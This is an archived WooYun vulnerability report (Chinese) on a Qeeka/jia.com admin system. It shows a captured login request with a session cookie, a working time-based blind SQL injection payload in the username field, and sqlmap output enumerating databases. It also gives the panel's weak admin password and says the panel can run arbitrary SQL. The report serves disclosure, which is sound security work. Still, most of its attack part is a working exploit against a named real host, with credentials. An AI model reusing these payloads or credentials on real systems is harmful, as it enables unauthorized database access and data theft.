当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130395

漏洞标题:齐家网某重要系统root权限注射+弱口令(可直接执行sql语句)

相关厂商:jia.com

漏洞作者: 路人甲

提交时间:2015-07-30 12:19

修复时间:2015-08-04 12:20

公开时间:2015-08-04 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乌云军,你不会是个妹子吧??这么淘气

详细说明:

10.png


11.png


乌云君。快告诉我你是不是妹子(再说齐家和qeeka不是谐音么??)

http://tianjin.qeeka.com/admin.jsp

抓包,

POST /admin.jsp?run-login/login-show-json-ajax-1 HTTP/1.1 Host: tianjin.qeeka.com Content-Length: 73 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://tianjin.qeeka.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://tianjin.qeeka.com/admin.jsp?show-login/login-layout-1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: IPLOC=CN4400; SUV=1507272131420486; ssl=false; JSESSIONID=D7EAD746DFA35CC675B49094864A4F89; BAIDU_DUP_lcr=https://www.baidu.com/link?url=jVhSOrrCSblqpNdM6fjxKU5sAUcm1Q4yHR_vFFAEmxRTzvKKnJOJ4AiIgAnuUg9d&wd=&eqid=9dcb644f000017400000000255b97e39 login%5Busername%5D=admin&login%5Bpassword%5D=admin&login%5BappId%5D=mzmf

name可注射

1.png

2.png

跑的很慢,先看下弱口令! admin/123456

3.png

4.png

时间是最新的 看看功能 在服务设计中,有好多功能我们点击图形看看

6.png

7.png

可以看到好多节点,双击之后调出节点控制面板,其中可执行sql语句

8.png

9.png

sqlmap resumed the following injection point(s) from stored session: --- Parameter: login[username] (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: login[username]=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))lLy ND 'lgZA'='lgZA&login[password]=admin&login[appId]=mzmf --- [09:41:20] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.12 [09:41:20] [INFO] fetching database names [09:41:20] [INFO] fetching number of databases [09:41:20] [WARNING] time-based comparison requires larger statistical model ease wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (opt '--time-sec')? [Y/n] y [09:41:42] [WARNING] it is very important not to stress the network adapter ng usage of time-based payloads to prevent potential errors [09:41:54] [INFO] adjusting time delay to 3 seconds due to good response tim 6 [09:41:55] [INFO] retrieved: [09:42:19] [ERROR] invalid character detected. retrying.. [09:42:19] [WARNING] increasing time delay to 4 seconds in [09:43:18] [ERROR] invalid character detected. retrying.. [09:43:18] [WARNING] increasing time delay to 5 seconds form [09:45:31] [ERROR] invalid character detected. retrying.. [09:45:31] [WARNING] increasing time delay to 6 seconds [09:45:54] [ERROR] invalid character detected. retrying.. [09:45:54] [WARNING] increasing time delay to 7 seconds a [09:46:51] [ERROR] invalid character detected. retrying.. [09:46:51] [WARNING] increasing time delay to 8 seconds tion_sc [09:51:44] [ERROR] unable to properly validate last character value ('i').. iema [09:52:30] [ERROR] invalid character detected. retrying.. [09:52:30] [WARNING] increasing time delay to 4 seconds [09:52:32] [INFO] retrieved: commonservice [09:59:26] [INFO] retrieved: [10:00:02] [ERROR] invalid character detected. retrying.. [10:00:02] [WARNING] increasing time delay to 5 seconds mac [10:01:31] [ERROR] invalid character detected. retrying.. [10:01:31] [WARNING] increasing time delay to 6 seconds dat [10:03:24] [ERROR] invalid character detected. retrying.. [10:03:24] [WARNING] increasing time delay to 7 seconds [10:03:52] [ERROR] invalid character detected. retrying.. [10:03:52] [WARNING] increasing time delay to 8 seconds [10:04:30] [ERROR] unable to properly validate last character value ('{').. { [10:04:35] [INFO] retrieved: m [10:05:14] [ERROR] invalid character detected. retrying.. [10:05:14] [WARNING] increasing time delay to 4 seconds [10:05:43] [ERROR] invalid character detected. retrying.. [10:05:43] [WARNING] increasing time delay to 5 seconds ysql [10:07:26] [INFO] retrieved: [10:07:55] [ERROR] invalid character detected. retrying.. [10:07:55] [WARNING] increasing time delay to 6 seconds [10:08:36] [ERROR] invalid character detected. retrying.. [10:08:36] [WARNING] increasing time delay to 7 seconds [10:09:23] [ERROR] invalid character detected. retrying.. [10:09:23] [WARNING] increasing time delay to 8 seconds secu [10:12:22] [ERROR] unable to properly validate last character value ('y').. y [10:12:41] [ERROR] invalid character detected. retrying.. [10:12:41] [WARNING] increasing time delay to 4 seconds i

9.png

root权限

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-04 12:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-08-17:非常感谢对我们的网站的关注,我们会持续改进